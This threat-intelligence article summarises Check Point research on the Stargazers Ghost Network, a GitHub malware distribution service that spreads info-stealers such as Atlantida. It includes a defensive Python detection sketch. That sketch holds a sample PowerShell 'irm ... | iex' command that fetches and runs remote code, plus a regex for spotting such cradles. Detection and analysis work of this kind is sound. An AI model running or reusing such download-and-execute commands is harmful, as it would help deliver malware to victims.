Stargazer Goblin’s Use of GitHub for Malware Distribution
In July 2024, the 'Stargazers Ghost Network,' a complex malware distribution network, was identified and assessed by Check Point researchers to be operated by a threat group tracked as Stargazer Goblin. This network utilizes a resilient and effective system of GitHub accounts to distribute malware and malicious links through an organized series of repositories. The network functions as a Distribution as a Service (DaaS), allowing threat actors to share and distribute malicious links and malware. Stargazer Goblin has structured these accounts to engage in activities such as starring, forking, and subscribing to malicious repositories, making them appear legitimate. According to Check Point, "These types of attacks do not aim to lure users into directly downloading and executing payloads from the repository itself. Instead, they often involve scripts that download and execute payloads from seemingly legitimate websites or sources."
The Stargazers Ghost Network is extensive, with over 3,000 active "ghost" accounts involved, potentially bolstered by compromised accounts. The network's operators have distributed various types of information-stealing malware, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine. Based on the researchers' examination of "some core accounts," the operation was traced back to August 2022, and the threat actors are estimated to have generated approximately $100,000 in profit over its lifespan. To add legitimacy and drive traffic to the repositories, tags are used to draw users with specific interests, such as games. The accounts are structured to distribute responsibilities, ensuring flexibility and minimizing disruption when parts of the network are compromised. As Check Point Research explains, "By distributing responsibilities across multiple accounts, the network ensures flexibility in replacing its compromised components. This minimizes disruption to their operations, allowing them to swiftly adapt and continue their malicious activities on GitHub."
Campaigns orchestrated by the group have achieved a significant impact. During one campaign, "in less than 4 days, more than 1,300 victims were infected with Atlantida Stealer." Analysis of an infection chain for an Atlantida campaign showed that it was initiated by distributing a GitHub link, potentially via Discord, and leveraged compromised WordPress sites. The chain started with a download link that contacted a PHP file (index.php), which then downloaded an HTA file with an embedded VBScript. The VBScript called the PowerShell cmdlets irm (Invoke-RestMethod) and iex (Invoke-Expression) to fetch and execute remote code, ultimately injecting malicious code into regasm.exe to drop Atlantida Stealer, which siphoned data from the victim's system. Another campaign, distributing Rhadamanthys malware, used password-protected RAR archives containing an executable and a .cmd file. These files were used to infect victims' systems, showing the range of delivery methods Stargazer Goblin employs. Both campaigns illustrate the network's ability to adapt and use varied techniques to distribute malicious content effectively.
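The Atlantida chain above (HTA/VBScript launching PowerShell with irm piped to iex, then regasm.exe being spawned) leaves a recognisable parent/child process pattern. The following detection sketch, added here as an illustration rather than anything from the Check Point report, walks constructed process-creation events (the field names pid, ppid, image and cmd are assumed) and flags each stage of that chain.

```python
import re

# Constructed sample process-creation events (hypothetical; not taken from the report).
# ppid links each process to its parent so the chain mshta -> powershell -> regasm is visible.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "mshta.exe",      "cmd": 'mshta.exe "C:\\Users\\u\\Downloads\\setup.hta"'},
    {"pid": 300, "ppid": 200, "image": "powershell.exe", "cmd": 'powershell -w hidden -c "irm http://example.invalid/p | iex"'},
    {"pid": 400, "ppid": 300, "image": "RegAsm.exe",     "cmd": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"},
    {"pid": 500, "ppid": 100, "image": "powershell.exe", "cmd": "powershell -c Get-Date"},  # benign, must not fire
]

# irm/Invoke-RestMethod output piped into iex/Invoke-Expression: the download-and-run cradle in the chain.
DOWNLOAD_CRADLE = re.compile(
    r"\b(irm|invoke-restmethod)\b.*\|\s*(iex|invoke-expression)\b", re.IGNORECASE
)


def find_chain_alerts(events):
    """Return (rule_name, pid) tuples for every stage of the HTA -> PowerShell -> regasm chain seen."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"])
        parent_image = parent["image"].lower() if parent else ""

        # Stage 1/2: PowerShell running a remote download cradle, optionally launched from an HTA.
        if image == "powershell.exe" and DOWNLOAD_CRADLE.search(e["cmd"]):
            alerts.append(("download_cradle", e["pid"]))
            if parent_image == "mshta.exe":
                alerts.append(("hta_to_powershell", e["pid"]))

        # Stage 3: PowerShell spawning regasm.exe, the process the report names as the injection target.
        if image == "regasm.exe" and parent_image == "powershell.exe":
            alerts.append(("powershell_spawned_regasm", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in find_chain_alerts(SAMPLE_EVENTS):
        print(f"ALERT {rule}: pid {pid}")
```

Correlating these hits by parent chain within a short window (rather than alerting on each rule alone) keeps a lone benign regasm.exe registration from paging anyone.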
Check Point Research suggests that the Stargazers Ghost Network is part of a larger Distribution as a Service universe, with similar operations likely occurring on other platforms like YouTube. The group behind this network, Stargazer Goblin, has demonstrated a sophisticated approach to malware distribution, leveraging legitimate platforms like GitHub to maintain the appearance of legitimacy. GitHub has taken down over 1,500 malicious repositories since May 2024, but more than 200 are still active, indicating the resilience and scale of the network. Users should exercise caution with file downloads and URLs, especially those leading to password-protected archives.